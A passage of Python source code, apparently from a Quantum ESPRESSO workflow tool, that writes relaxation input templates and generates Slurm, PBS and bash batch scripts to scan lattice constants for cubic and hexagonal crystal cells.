shutil.copyfile(item, os.path.join(directory, item))
break
#
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
with open(os.path.join(directory, inpname), 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
self.cell.to_in(fout)
self.arts.to_in(fout)
# gen yhbatch script
self.gen_yh(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
# gen pbs script
self.gen_pbs(directory=directory, inpname=inpname, cmd="$PMF_PWX", output=output, jobname=self.run_params["jobname"], nodes=self.run_params["nodes"], ppn=self.run_params["ppn"], queue=self.run_params["queue"])
# gen cdcloud script
self.gen_cdcloud(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("%s $PMF_PWX < %s | tee %s" % (self.run_params["mpi"], inpname, output))
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="vc-relax", server=self.run_params["server"])
def set_relax(self):
self.control.calculation("relax")
self.control.basic_setting("relax")
self.system.basic_setting(self.arts)
self.electrons.basic_setting()
self.ions.basic_setting()
def set_vc_relax(self):
self.control.calculation("vc-relax")
self.control.basic_setting("vc-relax")
self.system.basic_setting(self.arts)
self.electrons.basic_setting()
self.ions.basic_setting()
def cubic(self, directory="tmp-qe-relax-cubic", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
if self.batch_a == None:
# namely all in one batch
self.batch_a = na
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
#
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal namely fractional coordinate can be convert from cartesian coordinates
# the conversion process is like transformation of presentation in quantum mechanics
# the convmat is bulid to do the conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
# gen llhpc script
with open("relax-cubic-%d.slurm" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
# gen pbs script
with open("relax-cubic-%d.pbs" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
# gen local bash script
with open("relax-cubic-%d.sh" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
# gen cdcloud script
with open("relax-cubic-%d.slurm_cd" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
os.system("bash relax-cubic-%d.sh" % i_batch_a)
os.chdir("../")
for i_batch_a in range(n_batch_a):
server_handle(auto=auto, directory=directory, jobfilebase="relax-cubic-%d" % i_batch_a, server=self.run_params["server"])
def hexagonal(self, directory="tmp-qe-hexagonal", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01], range_c=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a == None:
# namely all in one batch
self.batch_a = na
else:
pass
if self.batch_c == None:
# namely all in one batch
self.batch_c = nc
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal namely fractional coordinate can be convert from cartesian coordinates
# the conversion process is like transformation of presentation in quantum mechanics
# the convmat is bulid to do the conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
# gen llhpc script
with open("relax-hexagonal-%d-%d.slurm" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# here with the usage of length and scale in bs processing, we can make sure that number like '.123' will be correctly
# set as '0.123', namely the ommited 0 by bs by default is not ommited now!
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
